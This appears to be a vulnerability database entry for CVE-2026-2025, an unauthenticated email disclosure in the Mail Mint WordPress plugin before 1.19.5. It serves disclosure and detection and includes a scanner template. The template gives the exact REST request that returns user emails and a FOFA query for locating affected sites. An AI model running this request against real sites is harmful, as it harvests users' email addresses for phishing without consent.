Mail Mint < 1.19.5 - Unauthenticated Email Disclosure
CVE-2026-2025
Verified
Description
Mail Mint WordPress plugin versions before 1.19.5 contain an information disclosure vulnerability caused by a missing authorization check in a REST API endpoint, which lets unauthenticated users retrieve the email addresses of blog users. Exploitation requires no authentication.
Severity
High
CVSS Score
7.5
Exploit Probability
29%
Affected Product
mail-mint
Published Date
March 16, 2026
Template Author
0x_akoko
CVE-2026-2025.yaml
id: CVE-2026-2025

info:
  name: Mail Mint < 1.19.5 - Unauthenticated Email Disclosure
  author: 0x_Akoko
  severity: high
  description: |
    Mail Mint WordPress plugin < 1.19.5 contains an information disclosure vulnerability caused by lack of authorization in a REST API endpoint, letting unauthenticated users retrieve email addresses of blog users, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can retrieve email addresses of users, leading to privacy breaches and potential phishing attacks.
  remediation: |
    Update to version 1.19.5 or later.
  reference:
    - https://wpscan.com/vulnerability/1b815cde-cd9d-46fa-a6ab-3d2851705e7b/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2025
    - https://wordpress.org/plugins/mail-mint/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-2025
    epss-score: 0.28814
    epss-percentile: 0.96619
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: mail-mint
    product: mail-mint
    fofa-query: body="/wp-content/plugins/mail-mint/"
  tags: cve,cve2026,wordpress,wp-plugin,mail-mint,exposure,unauth,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/mrm/v1/wp/admins?term=@"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"admins\"", "\"label\"", "@")'
        condition: and
# digest: 480a004530430220084ff87b744a3d2fb47f73bb1dda338e05c548b3c15086c97972efa56e6ba0b5021f73515cbe14826b1a382b4811c9871a72e7c68145d29f4f17f98ac3cce5d45c:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2026-2025
CWE ID: CWE-200
Remediation Steps
Update to version 1.19.5 or later.